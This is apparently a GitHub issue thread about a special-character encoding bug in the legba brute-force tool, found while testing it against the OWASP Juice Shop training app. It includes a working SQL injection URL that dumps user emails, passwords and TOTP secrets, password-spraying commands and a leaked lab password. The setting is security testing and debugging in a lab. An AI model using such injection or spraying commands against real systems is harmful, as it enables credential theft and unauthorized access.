http encoding issue

[niqdev]

Hi, thanks for the awesome project!

I'm testing legba with my hckops/hckctl tool against the owasp juice shop and it looks like something is wrong with the encoding or escaping of special chars, could you please verify?

This is how I found the issue

# starts juice-shop
hckctl box start vulnerable/owasp-juice-shop

# generates users.txt
curl -sS -H "Accept: application/json" "http://juiceshop:3000/rest/products/search?q=foo%'))+UNION+SELECT+id,username,email,password,role,deluxeToken,totpSecret,isActive,createdAt+FROM+Users;--" | \
  jq -r '.data[].description' > /hck/share/users.txt

cat /hck/share/users.txt
[email protected] # <<<<<<<<<< user with password admin123
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected] # <<<<<<<<<< user with password 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
demo
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

# password not found
hckctl task legba --inline -- legba http \
  --target http://box-owasp-juice-shop-<RANDOM>:3000/rest/user/login \
  --username /hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'

Official solution https://help.owasp-juice.shop/appendix/solutions.html, search for Dumpster dive the Internet for a leaked password and log in to the original user account it belongs to or the password

In order to exclude that it's an issue with my tool, I built the project locally and this is how I verify it

# password spray with admin123
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password 'admin123' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# prints
# [INFO ] [2023-11-08 09:58:03] (http) <http://localhost:3000/rest/user/login> [email protected] password=admin123

# password spray with 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# not found

# I can confirm that the password is valid and solve the challenge with
http http://localhost:3000/rest/user/login email="[email protected]" password='0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB'
{
    "authentication": {
        "bid": 6,
        "token": "<REDACTED>",
        "umail": "[email protected]"
    }
}

I wanted to actually debug it properly, and probably it's because I'm not familiar with rust, I can build legba disabling the mqtt plugin, but when i'm trying to run it (same error with vscode, intellij, rustrover) I keep getting

thread 'main' panicked at <REDACTED>.cargo/registry/src/index.crates.io-6f17d22bba15001f/clap_builder-4.4.7/src/builder/debug_asserts.rs:275:9:
Command legba: Argument group name must be unique

        'Options' is already in use
stack backtrace:
   0: rust_begin_unwind
             at /rustc/cc66ad468955717ab92600c770da8c1601a4ff33/library/std/src/panicking.rs:595:5

Could you please verify it? I'm more than happy to contribute to the project and open a pr if this is an actual issue.
Thanks!

[evilsocket]

Hi, I think you're missing a couple of things :)

It looks like the payload should be {"email": "{USERNAME}", "password": "{PASSWORD}"}:

And because of it, a content type header must be added ... this command line works for me:

legba http \
    -T http://localhost:3000/rest/user/login \
    -U [email protected] \
    -P '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
    --http-method POST \
    --http-payload '{"email": "{USERNAME}", "password": "{PASSWORD}"}' \
    --http-headers "Content-Type=application/json"

Am I missing something?

[evilsocket]

Yep, can confirm that's also what httpie is sending (it seems it encodes data to json by default if no content-type is provided):

[niqdev]

Thanks for taking the time and look into this, I appreciate your feedback! What probably put me off track is that the admin123 was working 🤷🏻‍♂️

[evilsocket]

that's interesting actually ... will try to see why

[niqdev]

btw, are you setting anything in specific to build the project? i would have figured it out pretty quickly debugging the actual code... if yes could you add it to the wiki?

I had to explicitly disable the mqtt plugin cos it was giving this error

error: failed to run custom build command for `paho-mqtt-sys v0.9.0`

but I didn't find out how to solve the issue with 'Options' is already in use while trying to run/debug the app

[evilsocket]

just cargo build --release ... maybe you're missing cmake (that's what's required to build paho-mqtt-sys if i recall correctly)

[evilsocket]

AH! turns out you were 100% correct! That password does indeed break the request because not correctly encoded (while admin123 works because doesn't contain special chars):

Apparently the page accepts both JSON and normal payload ... my bad man! Will fix ASAP :D thanks for reporting

[evilsocket]

(in the meantime the json approach is a decent workaround)

[evilsocket]

pushed the fix, it now works as expected, thanks for reporting!

[niqdev]

awesome, thanks for the quick fix! 🚀

[evilsocket]

let me know if i can do anything else to help you integrate with your tool

[niqdev]

Thanks! It's still early stage and I'm trying to validate few ideas atm, when i'll get a chance I'd like to see how legba performs on a remote kube cluster with a "real" wordlist...

The idea is basically to abstract where a tool is running and how, to focus on the actual problem. This megalopolis/task/bruteforce/legba is how I defined your tool. I want to build a preset of commands for each tool and the most common use cases. Once I build a solid catalog and i'm familiar with all the tools and attacks i will focus on the orchestration and how to collect/parse/aggregate the results from various tools (which is the easiest part for me)

If you are interested I could add it as alternative way to run it in the installation section or an example page in the wiki to showcase legba against the juice-shop. It's up to you!